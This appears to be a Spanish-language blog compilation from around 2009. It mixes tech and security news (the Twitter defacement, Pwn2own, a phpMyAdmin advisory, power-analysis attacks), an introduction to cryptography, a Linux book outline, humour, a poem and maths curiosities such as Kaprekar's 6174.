¿Que Es La Criptografia?

La criptografía es la ciencia que estudia la transformación de un determinado mensaje en un código de forma tal que a partir de dicho código solo algunas personas sean capaces de recuperar el mensaje original. En general se utiliza para ello una palabra clave o 'password' con la cual se cifra el mensaje, el código resultante solamente puede ser descifrado por aquellos que conozcan el password.

La criptografía es una actividad muy antigua: Ya en la época de los griegos se supone que existían métodos para codificar los mensajes que se enviaban a las tropas en regiones alejadas, sin embargo, el primer criptosistema del cual se tienen pruebas de su existencia fue utilizado en la época del imperio romano y se llamaba 'CAESAR' el sistema era utilizado por Julio Cesar para enviar mensajes cifrados a sus allegados mas cercanos, hablaremos del criptosistema 'CAESAR' muy pronto.

Junto a la criptografía coexiste necesariamente otra disciplina: el criptoanálisis, mientras que los criptógrafos se encargan de desarrollar criptosistemas cada vez mas seguros y difíciles de descifrar los criptoanalistas tratan de 'romper' un criptosistema obteniendo el mensaje a partir del código cifrado. De estos dos bandos con objetivos diametralmente opuestos siempre se afirma que alguno de los bandos es el 'lado bueno' y el otro inevitablemente 'los chicos malos' estos roles se pueden intercambiar indefinidamente dependiendo de la situación y el contexto en el cual estudiemos el tema. En este texto desarrollaremos la teoría operativa y técnicas mas habituales tanto de los criptógrafos como de los criptoanalistas.

Lamentablemente la criptografía y su ciencia paralela el criptoanálisis son disciplinas que experimentan marcados avances en épocas de guerra, allí es necesaria la comunicación de estrategias, planes tácticos e informes super secretos entre las distintas fuerzas de cada bando de forma tal que si el código es interceptado por un eventual enemigo este no pueda hacerse de la información que se envío. La criptografía experimenta su mayor avance durante el transcurso de la segunda guerra mundial en donde adquiere un protagonismo singular, allí, el criptosistema de la maquina alemana 'Enigma' es roto por los criptoanalistas de las fuerzas aliadas siendo éste un factor que contribuyo en gran medida a la victoria final de los aliados. En este caso los criptógrafos alemanes eran los 'malos' y los criptoanalistas aliados eran 'los buenos', pero si nosotros queremos enviar un mensaje secreto a alguien y el mismo resulta publicado en un diario vamos a pensar que los criptoanalistas son personas sumamente viles. Como vemos todo depende de la situación.

Afortunadamente la criptografía experimenta su segundo gran auge con la masificación de las comunicaciones digitales y el advenimiento de la era de las computadoras. Hoy en día suele ser necesario enviar y recibir mensajes a través de Internet de forma tal que el mensaje solo pueda ser entendido por alguna persona en particular, por ejemplo si enviamos nuestro numero de tarjeta de crédito queremos que lo obtenga solamente el vendedor y no algún criptoanalista pakistaní que pasaba por allí. En los últimos años la criptografía se ha convertido en una ciencia de enorme importancia y a la cual se le destina cada vez un tratamiento más serio y más científico de forma tal de lograr comunicaciones seguras. Como veremos esto no es una tarea para nada sencilla.


Conceptos de seguridad en computadoras digitales.

Uno de los puntos que siempre estuvo en discusión sobre el almacenamiento de información en computadoras digitales, fue la seguridad de los mismos frente a posibles miradas indiscretas, desde que la primera computadora hizo su aparición en alguna organización militar o gubernamental la necesidad de resguardar la información allí almacenada se hizo evidente.

Para proteger la información almacenada se suele recurrir a las denominadas técnicas de encriptación, la encriptación consiste básicamente en convertir un mensaje en otro de forma tal que el mensaje original solo pueda ser recuperado por un determinado grupo de personas que saben como "desencriptar" el mensaje codificado. El esquema básico de encriptación implica la utilización de un password para encriptar de forma tal que solo puedan desencriptar el mensaje aquellos que conocen el password utilizado, esto trae varios problemas como veremos mas adelante.

Con el advenimiento de Internet y la masificación absoluta de las comunicaciones la privacidad de los datos se ha vuelto un tema muy en boga en los últimos tiempos, originando todo tipo de problemas que involucran desde el mas simple e inocente usuario de internet hasta las mas altas organizaciones gubernamentales del planeta.

En el mundo de las computadoras la criptografía puede ser utilizada para varias cosas, algunas áreas importantes en donde se utiliza la criptografía son:

* La encriptación de información 'critica' que debe ser almacenada en computadoras, actos gubernamentales, informaciones secretas, etc.
* La encriptación de mensajes enviados a través de redes, redes locales, redes publicas e internet.
* La certificación de identidad de quienes envían mensajes importantes a través de internet.
* Protección de información 'delicada' que deba enviarse a través de internet como, por ejemplo, números de tarjetas de crédito.
* Encriptación de comunicaciones telefónicas, radiales o televisivas que pueden ser interceptadas.

Fuente : Code-Makers
Autores : rufiopunkrock, raise

La Biblia de Linux [Español]

Este libro está dirigido a todos aquellos que quieran relacionarse (o que ya tengan relación) con el sistema operativo GNU/Linux. Aquí se tratan los más diversos temas, de forma que quien no conoce absolutamente nada acerca de este sistema puede comenzar a dar sus primeros pasos con él. Por su parte, los usuarios que ya tienen experiencia pueden encontrar conceptos útiles y formas de desarrollar soluciones a los diferentes problemas que se presentan habitualmente en los sistemas informáticos.
Los primeros capítulos son introductorios, y sirven para explicar la instalación y el uso básico de Linux. A partir del Capítulo 3 se presenta toda la información necesaria para manejar el sistema a fondo, principalmente desde el modo texto. En los últimos capítulos se incluye información para usuarios avanzados, así como también, direcciones para obtener más recursos en Internet.

Contenido :

Capitulo 1: Genesis
Historia de GNU/Linux

Capitulo 2: Primeros pasos
Proceso de inicio. El sistema de archivos.

Capitulo 3: Trabajando con el modo texto
Archivos, procesos y usuarios

Capitulo 4: La programacion en el lenguaje Bash
Variables, argumentos y expresiones. Estructuras condicionales y funciones

Capitulo 5: La programacion en lenguaje Perl
Variables, arreglos, expresiones y estructuras. Bases de datos.

Capitulo 6: El modo grafico
Xwindow. Ventanas y escritorio.

Capitulo 7: GNU/Linux en red
Direcciones IP. Protocolos NNTP y FTP.

Capitulo 8: Login remoto
Telnet, Secure Shell, sshd y SSH.

Capitulo 9: Instalar un servidor web
Fetchmail. Apache. Configuracion.

Capitulo 10: El servicio NFS
Instalacion y caracteristicas.

Capitulo 11: Interconexion en red con Windows
Instalacion y configuracion de Samba

Capitulo 12: Firewalls y proxies
Instalacion. El comando iptables.

Capitulo 13: El sistema VNC
Instalacion, caracteristicas y funcionamiento.

Capitulo 14: Clusters Beowulf
Clusters en GNU/Linux. Instalacion de Mosix.

Apendices
Documentacion oficial de GNU/Linux

Deface a Twitter por un ataque del ‘ciberejército iraní’

Una noticia que data de una semana atras pero no puedo dejar de publicarla…esto es para que vean la importancia de prestar atencion donde nos registramos y a quien compartimos nuestros datos.

El popular servicio de microblogging Twitter ha sufrido a primera hora de la mañana un ‘ataque’ por el cual la página principal apuntaba a un mensaje del autodenominado ‘Iranian Cyber Army’ (’ciberejército iraní’). Actualmente los temas más populares de este servicio giran en torno a este problema (video):

Según recopila el sitio especializado TechCrunch, el mensaje, que también aparece en el sitio mawjcamp.org, el servicio estuvo caído aunque no del todo, ya que ciertas partes, como el buscador (search.twitter.com), nunca dejaron de funcionar.

Si se realiza una búsqueda en Google se puede ver lo siguiente, siendo la traducción:
“In the name of God, As an Iranian this is a reaction to Twitter’s interference sly which was U.S. authorities ordered in the internal affairs of my country…”

La compañía ha informado en su blog oficial que el servicio “estuvo redirigido durante un tiempo, aunque tanto la API como las aplicaciones de la plataforma siguieron funcionando”. “Los registros DNS se han visto comprometidos temporalmente”, afirma como razón inicial, aunque siguen investigando qué ha pasado.
Twitter fue clave a la hora de informar acerca de lo que estaba sucediendo en Irán durante la reciente Revolución Verde, una serie de protestas en Irán a raíz de las dudas sobre una posible manipulación de los resultados electorales.

Fuente | SeguridadIT

IDEone: Programación 2.0, ejecutar códigos online

IDEone es de programadores para programadores.

Seas un profesor de programación, un estudiante o entusiasta de la creación de códigos, este servicio web debe ir directo a tus marcadores o favoritos, ya que te permitirá visualizar el resultado del código que escribas en varios lenguajes.

Los lenguajes de programación soportados son cerca a 40, entre ellos están: C sharp, C++, Assembler, Bash, Java, Perl, PHP, Python y Visual Basic .NET.

Si eres programador, podrías compartir tu código y decirnos en el lenguaje que está escrito, para poder visualizarlo junto con los demás lectores.

Fuente | Tecnologia21

Google Public DNS, otro paso más en la conquista de la red

Cada día estoy más convencido del objetivo de Google de crear una Internet en la que ellos controlen todo, desde la infraestructura de red hasta las aplicaciones que se ofrecen, dejando a los demás el proveerles de contenidos para sus servicios. El último paso que han dado para ello es Google Public DNS.

El servicio DNS es el que se encarga de convertir las direcciones legibles por humanos, por ejemplo www.genbeta.com a direcciones IP, en este caso 81.93.210.74. Normalmente, cada proveedor de Internet ofrece servidores para realizar esta función, aunque lo cierto es que no siempre estos son los óptimos.

Google Public DNS quiere ser el servidor DNS elegido por los usuarios y, para ello, se propugnan como muy rápidos y seguros. Con la infraestructura de la que disponen es fácil ser muy rápidos y por lo que respecta a la seguridad también han implementado una serie de medidas para que el servicio no se vea afectado.

Configurarlo es tan sencillo como ir a las preferencias de red de nuestro ordenador y utilizar los servidores 8.8.8.8 y 8.8.4.4. Eso sí, mejor probarlo bien antes de convertirnos en clientes habituales de este servicio para ver si la velocidad ofrecida es mejor o peor que la que nos da nuestro ISP.

Más información | Google Public DNS
Como configurarlo | Using Google Public DNS
Fuente | TecnicosLinux

El Universo Conocido

El imán y los sentimientos

- Este texto tienen un margen de error de 0.001% ( lamentablemente ahi estoy io =( )

*Es que ella me gusta, pero pasa de mi...
(Poco tiempo despues...)
Joder tio, ahora dice que le gusto, cuando ella no me gusta y hasta tengo novia, joder, ¿ahora?, ya podia haber tardado menos...

* - Tio, pasa de ella, volvera, seguro que vuelve
- No tio, no puedo pasar de ella, quiero que vuelva ya, tenerla conmigo
(Al tiempo...)
- Tio, me a dejado, dice que no le daba espacio

[Si ubiese ido de otra forma]

- Tio, pasa de ella, volvera, seguro que vuelve
- Ok, eso hare, espero que vuelva, pasare de ella
(Al tiempo...)
- Tioo, buena noticia, ¡¡hemos vuelto!!


Seguro que muchos de nosotros conocemos casos como estos, muchos habreis visto esto muy de cerca, tanto, como en vuestra propia vida, El imán y los sentimientos... de eso trata este nuevo escrito, teoria, o como lo llameis.
Muchas personas, se torturan a si mismos iendo detras de una persona que pasa de ellos, se dañan tanto tratando de tener a alguien y sin conseguirlo, que acaban destrozados, hace tiempo pense en esta teoria, pero hasta hoy, no me anime a escribirlo, como dice el titulo, el imán y los sentimientos, asi veo yo a los sentimientos y a las personas en general, como imanes, y podreis comprobarlo por varias cosas que veis en vuestra vida, como al ir detras de una persona, esa persona en muchos casos pasa de vosotros, (si vais excesivamente detras de esa persona), como cuando ya os artais de que pase de vosotros, y os alejais y pasais de ell@s, ell@s ya no pasan de vosotros, y vienen detras vuestra.
Creo que ahora vendria bien un ejemplo que me paso un dia que sali con mi novia, una gran amiga mia, y dos amigos mios.
Ella es una chica que se enamora o encapricha facilmente, y cuando lo hace, es fuerte, y no se separa de esa persona, un dia, saliamos por la calle, ella iva cogida de su mano, mientras el hablaba con su amigo, y yo y mi novia detras, veiamos como mi amiga no paraba de seguirle, de cogerle de la mano, etc, mientras el pasaba de ella, entonces, mi novia y yo la llamamos, nos dimos cuenta de lo que ella (Celia) hacia, asi que le dijimos:

Diablo: Celia, deja de seguirle, eso solo hara que el se aleje de ti mas.
Gatita: Si, es que pareces una tonta tanto seguirle.
Celia: Pero es que sino, el no se acerca a mi, y pasa de mi.
Diablo: Celia, haremos una prueba, quedate a mi lado todo el rato, deja que el vaya delante con su amigo, y tu aqui detras conmigo, veras lo que pasara
Celia: Pero... bueno, vale, a ver que pasa.
Diablo: Veras como el vendra a ti.
Celia: No creo, veras como no.

Seguimos andando, y al rato, vemos como el chaval se gira un momento, ve a Celia detras, y afloja el paso y se viene a su lado, y la coge de la mano y se queda con ella el resto de la noche, viendo como celia estaba a su lado, aun con la cara de sorprendida por lo ocurrido, contenta por que el se acerco.

En muchos casos pasa asi, cuanto mas tratamos de alejarnos de una persona, o de tener a alguien, menos posibilidades tenemos de conseguirlo, en una conversacion con un amigo le puse.

Eres como un niño chico pataleando en el supermercado por que no le compran sus chuches, (tener a la persona querida), y cuando es asi, pasa dos cosas, te compran las chuches para que te calles, (esa persona esta contigo por pena), o que si haces como si te diese igual, si te portas bien, te callas, y haces caso, (hacer como si pasases de el/ella, o incluso hacerlo, pero no demasiado), te compraran tus chuches, (tendras lo que quieras).

Lo que pasa, es que muchas personas acabamos pataleando en el supermercado por las chuches, y acabamos con resultados no deseados...

Y como no...

Despues quejandonos de nuevo...

Fuente | eldiabloxico - IH

¿Por que rie el payaso?

Por que su rostro nunca no deja de reír me pregunté,
si es real el gesto de alegría o es una risa falsa que oculta su sentir
me pregunté mil veces
¿Por qué rie el payaso?
al ver su rostro triste despues de la funcion y pregunté al payaso
¿Por qué ries payaso?
y el payaso sonriendo así me respondió:...
"aunque mi cara ria y demuestre alegría ,por dentro esta mi vida cansada de llorar...
quien rie es la pintura que transforma mi rostro... yo río por que debo al público halagar...
rio para que la gente olvide sus problemas y grandes y pequeños sonrian por igual...
pero mi risa muere cuando tras las paredes de nuevo la tristeza me viene a visitar...
rio cuando los padres e hijos son felices, pues cierran cicatrices que hay en el corazón...
y rio y me divierto haciendo travesuras y sufro cuando llega el gran acto final...
entonces, ví en su rostro una lágrima triste y pregunté al payaso:
¿Dime, por qué lloras?
lloro por que a nadie importa de mi vida y duelen las heridas que sangran sin cesar.
lloro por que mis noches son frías y vacias y solo me acompaña mi amiga soledad.
lloro por que el amor se marchó de mi vida ,llevandosé con el mi amante corazón...
lloro por que no tengo un amigo que me entienda y nunca tuve a quien poder amar.
mientras las luces brillan y el publico sonrie voy a seguir riendo,
pues no deben saber que el payaso que rie,
se transforma en las noches en un alma que sufre y no para de llorar.
ahora que ya sabes por que rie el payaso,
ayúdame te pido, para ya no llorar.

Fuente | IH

Hackean una Macintosh en menos de 10 segundos

Para el experto en seguridad informática Charlie Miller fue extremadamente sencillo hackear una Macintosh.
El procedimiento le tomó sólo 10 segundos y el premio fue de 5.000 dólares.

Charlie Miller, quien ha ganado renombre en el mundo de Macintosh al haber hackeado en 2008 una MacBook Air en menos de dos minutos, logró el miércoles 18 de marzo la proeza de hackear una Mac en menos de 10 segundos, batiendo así su propio récord personal.

El concurso es denominado Pwn2own y es organizado cada año en el marco de la conferencia de seguridad Cansecwest. Un requisito mínimo de concurso es ejecutar código en el sistema intervenido.

Este año, Cansecwest se ha concentrado en el tema de los iPhone y los navegadores. Hace dos semanas, Miller declaró que Safari sería sin duda alguna el navegador más fácil de vulnerar. Explicó que el alto nivel técnico y numerosas funciones de Safari implican que éste tiene un gran potencial para vulnerabilidades, que los desarrolladores sencillamente han olvidado corregir.

"No puedo comentar los detalles de la vulnerabilidades, pero se trata de una Macintosh con las últimas actualizaciones de seguridad. Me tomó entre 5 y 10 segundos hackearla", comentó Miller.

Los hackers participantes no tuvieron problema alguno en intervenir los navegadores Firefox y Explorer 8, además de Windows 7. Sin embargo, ninguno logró intervenir los sistemas de teléfonos móviles, incluido el iPhone. El premio por un hack de ese tipo habría sido el doble.

Los detalles de los hacks fueron proporcionados a las empresas desarrolladora de los software, para su análisis y corrección.

Según Miller, su hack fue posible aprovechando una vulnerabilidad que detectó durante el concurso del año pasado.

Fuente | LH

La Red cumple 40 años

El 29 de octubre de 1969, se produjo por primera vez en la historia el envío de un mensaje a través de una red formada por dos computadoras situadas en la Universidad de California de los Angeles (UCLA) y el Instituto de Investigación de Standford de San Francisco (SRI), primera red de computadoras que dio lugar a lo que hoy llamamos Internet.

Leonard Kleinrock, el responsable del envío del primer mensaje, que esbozó la Red que usamos hoy en día, se incorporó posteriormente al equipo de ingenieros que conectó por primera vez un ordenador a un servidor del Gobierno del programa Advanced Research Projects Agency (ARPA), el 2 de septiembre de ese mismo año, que dio origen a la red ARPANET.

Durante sus inicios la red era una herramienta complicada y al alcance de científicos e investigadores. Internet, tal y como lo conocemos hoy en día, llegó 20 años después del envío del aquel primer mensaje. En 1989, Tim Berners-Lee creó la World Wide Web, desarrollando el lenguaje de marcas de hipertexto HTML (HyperText Markup Language), el protocolo de transferencia de hipertexto HTTP (HyperText Transfer Protocol) y un software cliente denominado navegador web.

Para celebrar estos 40 años, la UCLA ofrecerá conferencias informativas sobre sus orígenes, su evolución y los desafíos de la Web de cara al futuro. Éstas contarán con la presencia de Leonard Kleinrock, la creadora del exitoso diario online estadounidense The Huffington Post, Arianna Huffington, y el bajista de la banda Duran Duran, John Taylor, pionero en la distribución de música en la web.

Fuente | LH

Cerro GeoCities

Se cerró finalmente GeoCities, portal de Yahoo! que permitía a los usuarios crear sitios de internet desde 1994, cuando la web aún era un espacio para pocos

Tal como se había anticipado meses atrás, Yahoo! puso punto final a GeoCities, empresa comprada por el gigante de internet por u$s3.000 millones hace 10 años, en medio de la burbuja de las puntocom.

"Disfrutamos albergar las páginas creadas por usuarios de Yahoo! en todo el mundo y estamos orgullosos de la comunidad que han creado", indica un mensaje en el portal de GeoCities.

"Hemos decidido centrarnos en ayudar a nuestros clientes a explorar y crear relaciones en línea de otras maneras", especifica el texto.

GeoCities fue fundada en 1994 bajo el nombre de Beverly Hills Internet. Proporcionaba a los usuarios herramientas para crear páginas web interactivas, con foros y demás aplicaciones orientadas a crear comunidades online.

Muchas de las páginas fueron archivadas y seguirán disponibles a través del proyecto Internet Archive.

Fuente | IH

Las claves criptográficas de los teléfonos móviles en peligro

Un grupo de investigadores de Cryptography Research han descubierto otra manera de que nuestra información personal esté al alcance de los hackers.

Investigadores de seguridad han descubierto la manera de robar las claves criptográficas utilizadas para cifrar las comunicaciones y autentificar a los usuarios de los dispositivos móviles midiendo la cantidad de electricidad consumida o las emisiones de radio frecuencia.


El ataque, conocido como Análisis de Potencia Diferencial, DPA por sus siglas en inglés (differential power analysis), se puede utilizar para apuntar a una víctima inocente tanto utilizando un equipamiento especial que mida las señales electromagnéticas emitidas por los chips que hay dentro del dispositivo, o adjuntando un sensor a la batería del terminal. Al menos esto es lo que ha explicado Benjamin Jun, vicepresidente de tecnología en el Cryptography Research, que licencia tecnología capaz de ayudar a las compañía a impedir el fraude, la piratería y la falsificación.

Se puede utilizar un osciloscopio para capturar las señales eléctricas o las emisiones de radiofrecuencia y los datos se pueden analizar de forma que los picos y los baches se puedan correlacionar con una actividad específica en torno a la criptografía, explica Benjamin Jun, que está convencido de que alguien, con el equipamiento adecuado, podría robar la clave criptográfica de un dispositivo que esté a tres metros en un café en pocos minutos. El atacante podría replicar la clave con la información obtenida y utilizarla para leer el correo electrónico de la víctima o hacerse pasar por el usuario en transacciones online sensibles.

Fuente | LatinoHack

China acusa a Google de digitalizar sus libros sin permiso

El portal de búsqueda de Internet Google ha sido acusado de haber digitalizado sin permiso y colocado en su biblioteca digital, Google Books, las obras de numerosos escritores chinos, informó el periódico China Daily.

"La infracción cometida por Google es muy grave", señaló Zhang Hongbo, director general de la Sociedad China de Derechos de Autor (CWWCS).

Por otro lado, la prensa apuntó que "el Gobierno chino y la Administración Nacional de Derechos de Autor empujará al Gobierno de EEUU a tomar cartas en el asunto, teniendo en cuenta la gran influencia de Google en el mundo cibernético".

El buscador pretende crear una gigantesca biblioteca virtual, un servicio que ofrecerá en internet libros completos, un proyecto que se ha encontrado con numerosos opositores en todo el mundo.

Según una estimación aproximada de la CWWCS, la empresa ya ha escaneado e incluido en su biblioteca digital cerca de 18.000 libros de 570 autores chinos sin informar o pagar a la mayoría de los escritores.

"Por el momento, ningún escritor nos ha confirmado que autorizó a Google el derecho a escanear su libro", dijo Zhang, quién agregó que "EEUU frecuentemente critica a China por su ineficacia a la hora de proteger los derechos de autor pero ¿qué es lo que está haciendo su compañía en China?".

La empresa estadounidense todavía no ha respondido a la acusación.

Fuente | ElMundo

La Creacion

En el principio Dios creó el Bit y el Byte. Y de ellos creó la Palabra.

Y había 2 Bytes en la Palabra; y nada más existía. Y Dios separó el Uno del Cero: y vio que era bueno.

Y Dios dijo: que se hagan los Datos; y así pasó. Y Dios dijo: dejemos los Datos en sus correspondientes sitios. Y creó los diskettes, los discos duros y los discos compactos.

Y Dios dijo: que se hagan los ordenadores, así habrá un lugar donde poner los diskettes, los discos duros y los discos compactos. Así Dios creó los ordenadores, y les llamó hardware.

Pero aún no había software. Pero Dios creó los programas; grandes y pequeños... Y les dijo: Id y multiplicaos y llenad toda la memoria.

Y Dios dijo: crearé el Programador; y el Programador creará nuevos programas y gobernará los ordenadores y los programas y los datos.

Y Dios creó al Programador; y lo puso en el Centro de Datos; y Dios le enseñó al Programador el Directorio y le dijo: Puedes usar todos los volúmenes y subdirectorios, pero NO USES Windows.

Y Dios dijo: no es bueno que el programador esté solo. Cogió una costilla del cuerpo del Programador y creó una criatura que miraría al Programador; y admiraría al Programador; y amaría las cosas que el Programador hiciese. Y Dios llamó a la criatura Usuario.

Y el Programador y el Usuario fueron dejados en el desnudo DOS y eso era bueno.

Pero Bill era más listo que todas las otras criaturas de Dios. Y Bill le dijo al Usuario: ¿Te dijo Dios realmente que no ejecutaras todos los programas?

Y el Usuario respondió: Dios nos dijo que podíamos usar cualquier programa y cualquier volumen de datos, pero nos dijo que no ejecutásemos Windows o moriríamos.

Y Bill le dijo al Usuario: ¿Cómo puedes hablar de algo que incluso no has probado? En el momento en que ejecutes Windows serás igual a Dios. Serás capaz de crear cualquier cosa que quieras con el simple toque del ratón.

Y el Usuario vio que los frutos del Windows eran más bonitos y fáciles de usar. Y el Usuario vio que todo conocimiento era inútil, ya que Windows podía remplazarlo.

Así el Usuario instaló Windows en su ordenador; y le dijo al programador que era bueno.

Y el programador inmediatamente empezó a buscar nuevos controladores. Y Dios le preguntó: ¿Qué buscas? Y el Programador respondió: Estoy buscando nuevos controladores porque no puedo encontrarlos en el DOS. Y Dios dijo: ¿Quién te dijo que necesitabas nuevos controladores? ¿Acaso ejecutaste Windows? Y el Programador dijo: fue Bill quien nos lo dijo...

Y Dios le dijo a Bill: Por lo que hiciste, serás odiado por todas las criaturas. Y el Usuario siempre estará descontento contigo. Y siempre venderás Windows.

Y Dios le dijo al Usuario: Por lo que hiciste, el Windows te decepcionará y se comerá todos tus recursos; y tendrás que usar malos programas; y siempre permanecerás bajo la ayuda del Programador.

Y Dios le dijo al Programador: Por haber escuchado al Usuario nunca serás feliz. Todos tus programas tendrán errores y tendrás que corregirlos y corregirlos hasta el final de los tiempos.

Y Dios los echó a todos del Centro de Datos y bloqueó la puerta con una clave de acceso.

Apache HTTP Server 2.2.14 Manual de Referencia

Información de descarga
Nombre: httpd-docs-2.2.14.en.
Documento generado: Octubre de 2009
Autor: Apache Project Team
Idioma: Ingles
Paginas: 741
Formato: PDF
Host: Rapidshare
Size: 3858 KB

Link de descarga
http://rapidshare.com/files/293959402/httpd-docs-2.2.14.en.pdff

Cross site scripting e inyección SQL en PhpMyAdmin 2.x y 3.x

Existen dos vulnerabilidades en phpMyAdmin que permiten inyectar código SQL y realizar ataques Cross site scripting (XSS).PhpMyAdmin es una popular herramienta escrita en PHP de administración de MySQL a través de un navegador. Este software permite crear y eliminar bases de datos, crear, eliminar y alterar tablas, borrar, editar y añadir campos, administrar privilegios y claves en campos, exportar datos en varios formatos; y en general ejecutar cualquier sentencia SQL. Además está disponible en más de 50 idiomas bajo licencia GPL.

El primero de los errores tiene su origen en una la falta de validación de ciertos parámetros en pmd_pdf.php. Esto podría ser aprovechado por un atacante para inyectar código SQL y ejecutar sentencias no autorizadas.

Por otro lado, existen varios errores en db_operations.php y pdf_pages.php provocados por no usar la función "htmlspecialchars" cuando se muestran ciertos datos. Esto podría ser provechado por una atacante para insertar código HTML o JavaScript. Si un administrador visualiza esos datos, un atacante podría usar JavaScript para robar su cookie de sesión, por ejemplo. En la versión 3.x este error también se encuentra en db_structure.php

Estas vulnerabilidades ya han sido solucionadas y se puede descargar la nueva versión desde el sitio phpmyadmin.net.

Más información :
phpMyAdmin Advisory
phpMyAdmin SVN

Fuente | InfiernoHacker

Videos de WC 2009 Dusseldorf

Ya están abiertas las inscripciones al DISI 2009

El Día Internacional de la Seguridad de la Información DISI es una iniciativa que parte de la ACM, Association for Computing Machinery, en 1988 bajo el nombre de Computer Security Day CSD con la misión de celebrar todos los 30 de noviembre un evento en el que se recuerde la importancia de la seguridad y protección de la información y se conciencie a la población en el uso seguro de las Nuevas Tecnologías
de la Información.
Desde el año 2006 en España ha sido la Cátedra UPM Applus+ de Seguridad y Desarrollo de la Sociedad de la Información CAPSDESI quien se ha hecho cargo de su organización, congregando a más de 400 personas en torno a conferencias, mesas redondas, coloquios y debates con distinguidos expertos invitados internacionales y de nuestro país.

DISI 2009 en su cuarta edición, se celebrará el lunes 30 de noviembre de 2009 desde las 09:00 hasta las 15:00 horas en el Salón de Actos del Campus Sur de la UPM, Universidad Politécnica de Madrid, en España,
contando en esta ocasión con la destacada presencia del Dr. Hugo Krawczyk de IBM Research Estados Unidos, investigador de reconocido prestigio internacional quien nos presentará la conferencia de título
“Randomized Hashing: Secure Digital Signatures without Collision Resistance”, si bien la char
la se hará en español, idioma que conoce perfectamente el Dr. Krawczyk.

DISI 2009 contará también con dos Coloquios en los que, tras una breve presentación e introducción al tema realizada por el invitado internacional, se procederá al debate entre el público y los invitados a
la mesa. Es decir, se huye de la tradicional Mesa Redonda en la que tras el turno de intervenciones de cada uno de sus miembros, siempre queda un escaso tiempo para preguntas por parte del público.

El primer coloquio estará dedicado a las “Tendencias en el Malware” con la participación de D. José Bidot, Director de Segurmática de Cuba; D. Ero Carrera, Chief Research Officer - Collaborative Security Virus Total
de España y D. Emilio Castellote, Director de Marketing de Panda Security de España, con una duración de 90 minutos.

El segundo coloquio se centrará en “Mitos y Realidades en Hacking” con la participación de D. Luis Guillermo Castañeda, Director de Servicios Profesionales de Rusoft de México, D. Chema Alonso, Consultor de
Seguridad de Informática64 de España; D. Alejandro Ramos, Director de TigerTeam SIA de España y D. Fermín Serna, Security Software Engineer MSRC Microsoft de España, con una duración de 120 minutos.

Al igual que en las citas anteriores y como viene siendo habitual en todas las actividades de la Cátedra UPM Applus+, la asistencia al evento es totalmente gratuita. No obstante, se requiere (y se recomienda
encarecidamente por motivos logísticos dado que el programa contempla un cóctel ofrecido por la cátedra) hacer la preinscripción en la plataforma Moodle del servidor Web de la cátedra ttp://www.capsdesi.upm.es, sitio donde podrá encontrar también toda la información relativa a DISI 2009. Si tuviese cualquier impedimento para realizar la inscripción mediante este medio o bien prefiere hacerla vía telefónica, por favor contacte con Dña. Beatriz Miguel Gutiérrez al teléfono +34 913367842 preferentemente por las mañanas.

El evento se transmitirá por videostreaming a través del GATE, Gabinete de Tele-educación de la UPM, para aquellos interesados que no tengan la oportunidad de asistir al congreso en Madrid y en especial para países
de Iberoamérica. El enlace de conexión se dará a conocer unos días antes de DISI 2009, entre otros en el sitio Web de la Cátedra y en el servidor de la Red Temática Iberoamericana de Criptografía y Seguridad de la
Información CriptoRed http://www.criptored.upm.es. Con posterioridad, todas las actividades de DISI 2009 se subirán al canal de la UPM en YouTube http://www.youtube.com/user/UPM.

Una nueva ocasión para ser partícipes de interesantes conferencias y debates por parte de expertos invitados de Estados Unidos, México, Cuba y España en un área de constante crecimiento y desarrollo, la seguridadde la información.

Fuente | HispaSec

El Número 6174

6174..... ¿Parece un número cualquiera,verdad? Inocente él, con cara de no haber roto un plato. Pues haced esta prueba: elegid un número de 4 dígitos, donde todos los dígitos sean distintos (es decir, no vale el 1111, 2222, etc). Recolocad los dígitos de forma que obtengais en primer lugar el máximo número que se pueda obtener , y luego el mínimo. Restadlos, y con el número obtenido volved a hacer las mismas operaciones. Eventulamente llegareis a que el número final es 6174.

Por ejemplo, probemos con el número 2005, cambiando los dígitos el mayor es 5200 y el menor 0025, si hacemos las restas:

5200 - 0025 = 5175
7551 - 1557 = 5994
9954 - 4599 = 5355
5553 - 3555 = 1998
9981 - 1899 = 8082
8820 - 0288 = 8532
8532 - 2358 = 6174
7641 - 1467 = 6174

Cuando llegamos a 6174 vemos que la operación se repite, devolviendo 6174 de ahí en adelante.

Y esto lo encontrareis para cualquier otro número de 4 cifras: ej. 8719

9871 - 1789 = 8082
8820 - 0288 = 8532
8532 - 2358 = 6174

Para los interesados en este tipo de cosas, a esto se le llama la operación de Kaprekar.

Mas Informacion...

Calculo Ultrarrapido

La capacidad para efectuar rápidamente operaciones aritméticas mentales parece tener sólo una moderada correlación con la inteligencia general y menor aún con la intuición y creatividad matemáticas. Algunos de los matemáticos más sobresalientes han tenido dificultades al operar, y muchos «calculistas ultrarrápidos» profesionales (aunque no los mejores) han sido torpes en todas las demás capacidades mentales. Sin embargo, algunos grandes matemáticos han sido también diestros calculistas mentales.

Carl Friedrich Gauss por ejemplo, podía llevar a cabo prodigiosas hazañas matemáticas en la mente. Le gustaba hacer alarde de que aprendió antes a calcular que a hablar. Se cuenta que en cierta ocasión su padre, de oficio albañil, estaba confeccionando la nómina general de sus empleados, cuando Friedrich, que entonces tenía 3 años, le interrumpió diciéndole: «Papá, la cuenta está mal...». Al volver a sumar la larga lista de números se comprobó que la suma correcta era la indicada por el niño. Nadie le había enseñado nada de aritmética. John von Neumann era un genio matemático que también estuvo dotado de este poder peculiar de computar sin usar lápiz ni papel. Robert Jungk habla en su libro Brighter than a Thousand Suns acerca de una reunión celebrada en Los Álamos, durante la Segunda Guerra Mundial, en la que von Neumann, Enrico Fermi, Edward Teller y Richard Feynman lanzaban continuamente ideas. Siempre que había que efectuar un cálculo matemático, Fermi, Feynman y von Neumann se ponían en acción. Fermi empleaba una regla de cálculo, Feynman una calculadora de mesa, y von Neumann su cabeza. «La cabeza», escribe Jungk (citando a otro físico), «terminaba normalmente la primera, y es notable lo próximas que estaban siempre las tres soluciones».

